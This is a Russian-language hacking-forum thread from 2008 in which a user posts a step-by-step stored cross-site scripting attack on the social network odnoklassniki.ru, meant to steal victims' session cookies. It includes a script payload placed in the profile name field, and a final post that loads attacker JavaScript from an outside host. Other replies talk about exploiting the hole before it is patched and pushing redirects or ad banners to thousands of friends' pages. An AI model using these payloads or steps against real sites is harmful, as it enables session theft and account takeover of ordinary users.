ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Odnoklassniki.ru
  #1  
Старый 21.03.2008, 12:41
Аватар для Isis
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028

Репутация: 2371


По умолчанию Odnoklassniki.ru


[Intro]
Спустя 10 минут после регистрации на odnoklassniki.ru, была найдена активная xss...
Собственно регистрация для этого и была произведена
Что с неё взять?
-Конечно cookies (Не печенье).
Такой баг на огромнейшей соц.сети может вызвать п.зд.ц
К чему я все...начнем...
[Vulnerability]
Авторизуемся на сайте http://odnoklassniki.ru, если нет акка, пройдите 2х минутную авторизацию.
Далее проходим на свою личную страницу -> Основное -> Редактировать личные данные ->
(*.odnoklassniki.ru/dk?st.cmd=userSelfProfileEdit)
Ваше имя - <script>alert(/1/)</script>
Сохранить.
Переходим в "Форум" (*.odnoklassniki.ru/dk?st.cmd=userForum) -> Добавить -> Уже видна активка, но это не то
Пишем что-нибудь в сообщении -> Добавить
Переходим в свой форум -> Клацаем по ссылке "Написать сообщение" (далее [1]) ->
Ну и вот она активная xss

//Везде на вашей странице где есть сылка "Написать сообщение" + кликнув по ней будет активная xss
//будь то "Друзья" , "Друзья друзей", Сообщества" ...везде
[Application]
Жертве необходимо быть авторизованным на сайте и всего перейти по вашей ссылке [1] где и будет произведен ваш js код...
Желаю удачи
[Video]
ROFL, http://www.x3k.name/odnoklassniki.ru[active.xss]-Isis.rar
[Copyright]
© by Isis 13.03.2008, xeka.ru
Greetz to: gemaglabin, blackybr, +toxa+, ettee, b00zy_c0d3r, NOFEAR, Rebz, Barsik, c411k, Elekt, ettee, .fuf, lamarez, cash, limpompo, madnet, Great, podkashey, KEZ, GreenBear, w1z, m0nzt3r, PEPSICOLA , Puff, Proteus and other....
 
Ответить с цитированием

  #2  
Старый 21.03.2008, 12:45
Аватар для xcedz
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию

А ведь не давно стоило скока то денег (ТС ты эту багу пытался продать?)... что то творится не ладное... магнитные бури?

Ну вообще м то эт даже не похоже на статью, а обзор уязвимости
на одноклассниках, мб это связано с пристальным вниманием фсб на эту "контору" поэтому начался слив ?

Последний раз редактировалось xcedz; 21.03.2008 в 12:49..
 
Ответить с цитированием

  #3  
Старый 21.03.2008, 13:11
Аватар для SchmeL
SchmeL
Участник форума
Регистрация: 16.06.2007
Сообщений: 104
Провел на форуме:
178647

Репутация: 143
По умолчанию

тепрь все зависит от времени, кто быстрее...пока не прикрыли.
З.Ы допустим есть чел с 600 друзьями, друзья друзей более 3000. возможноли туда впихнуть редирект или банер рекламный какой на сайт?
 
Ответить с цитированием

  #4  
Старый 21.03.2008, 14:29
Аватар для КИНГ
КИНГ
Участник форума
Регистрация: 13.06.2006
Сообщений: 215
Провел на форуме:
2364210

Репутация: 49
По умолчанию

там же для воровства кук скрипт не вмещается :/
 
Ответить с цитированием

  #5  
Старый 21.03.2008, 21:57
Аватар для Isis
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028

Репутация: 2371


По умолчанию

КИНГ, Если перечитать статью и подумать?
 
Ответить с цитированием

  #6  
Старый 21.03.2008, 22:11
Аватар для Sn@k3
Sn@k3
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
Провел на форуме:
5151669

Репутация: 1198


Отправить сообщение для Sn@k3 с помощью ICQ
По умолчанию

мда )))) ты еще сайт открой и форум с платной булкой поставь, чтобы посвятить крутую хсс ))))))))))))))))))))))))))))) достаточно в знакомый до боли раздел пихнуть -)
 
Ответить с цитированием

  #7  
Старый 22.03.2008, 00:14
Аватар для Cawabunga
Cawabunga
Постоянный
Регистрация: 16.04.2007
Сообщений: 458
Провел на форуме:
2722721

Репутация: 364
Отправить сообщение для Cawabunga с помощью ICQ
По умолчанию

хм а как по поводу сайта ? кссоднаклассники.ру
 
Ответить с цитированием

  #8  
Старый 22.03.2008, 00:41
Аватар для freddi
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
Провел на форуме:
2943499

Репутация: 807
По умолчанию

isis , а ты не заметил еще одну?
когда человек будет писать в личку тому у кого стоит скрип вместо имени, то тоже он исполнится.
 
Ответить с цитированием

  #9  
Старый 22.03.2008, 01:46
Аватар для Cawabunga
Cawabunga
Постоянный
Регистрация: 16.04.2007
Сообщений: 458
Провел на форуме:
2722721

Репутация: 364
Отправить сообщение для Cawabunga с помощью ICQ
По умолчанию

Цитата:
isis , а ты не заметил еще одну?
когда человек будет писать в личку тому у кого стоит скрип вместо имени, то тоже он исполнится.
ксс2однаклассники.ру ? : ))
 
Ответить с цитированием

  #10  
Старый 27.03.2008, 05:39
Аватар для Isis
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028

Репутация: 2371


По умолчанию

<script src=http://66.ru/x.js></script>
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Управлением ФСБ России официально запрещен сайт odnoklassniki.ru biophreak Мировые новости 30 29.03.2008 01:44



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ